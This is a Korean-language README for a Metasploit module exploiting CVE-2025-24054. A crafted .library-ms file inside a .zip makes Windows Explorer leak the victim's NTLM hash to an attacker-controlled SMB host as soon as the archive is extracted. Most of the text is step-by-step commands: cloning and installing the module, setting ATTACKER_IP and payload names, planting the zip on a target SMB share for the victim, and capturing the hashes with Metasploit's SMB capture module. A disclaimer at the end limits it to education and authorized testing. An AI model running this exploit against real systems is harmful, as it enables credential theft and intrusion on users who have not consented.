
CVE-2025-24054(구 24071)를 이용한 Metasploit 모듈입니다. Windows 라이브러리 기반 공격 벡터를 위한 Metasploit에 내장된 NTLM 유출 익스플로잇입니다.
이 취약점은 .zip 파일을 추출하는 과정에서 발생합니다. 특수하게 조작된 .library-ms 파일과 상호작용하면 Windows 탐색기가 내부 XML 스키마를 처리하고 공격자가 제어하는 원격 경로로 SMB 인증 요청을 자동으로 시작합니다.
이 동작은 파일 압축 해제 외에 추가적인 상호작용 없이 사용자의 NTLM 해시를 유출할 수 있게 합니다. 개념 증명을 보려면 다음 링크를 방문하세요: Fluffy - HTB.
원래 이 취약점은 CVE-2025-24071로 알려졌으나, 현재는 공식적으로 CVE-2025-24054로 추적되고 있습니다.
리포지토리 클론:
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
Metasploit 디렉토리에 모듈 복사:
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
디렉토리가 없으면 생성:
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
그런 다음 모듈을 다시 복사합니다.
Metasploit을 실행하고 모듈 로드:
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
모듈이 정상적으로 로드되면 설정 옵션을 확인할 수 있습니다:
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes 공격자 IP (Responder/Impacket이 실행되는 곳)
FILENAME exploit.zip yes ZIP 파일 이름
LIBRARY_NAME documents.library-ms yes .library-ms 파일 이름
SHARE_NAME recurso yes 가짜 공유 리소스 이름
모듈을 설정하고 실행:
❯ set ATTACKER_IP 0.0.0.0 # 공격자 IP로 변경
❯ set FILENAME exploit.zip # SMB에 업로드할 페이로드 이름 (대상 시스템)
❯ set LIBRARY_NAME malicious.library-ms # .library-ms 파일 이름
❯ set SHARE_NAME it_shared # SMB 리소스 이름
❯ run
출력: 모듈은 .zip 파일을 생성하며, 이를 대상 SMB 서버에 업로드하여 피해자가 실행하도록 해야 합니다.
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
마지막으로 Metasploit의 SMB 캡처 모듈을 사용하여 NTLM 해시를 수신합니다:
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # 공격자 IP로 변경
❯ run
Metasploit에서 SMB 서버를 시작하는 데 문제가 있는 경우:
이 모듈은 교육 목적과 승인된 테스트 용도로만 개발되었습니다. 이러한 도구를 무단으로 사용하는 것은 불법이 될 수 있습니다.
Security Layer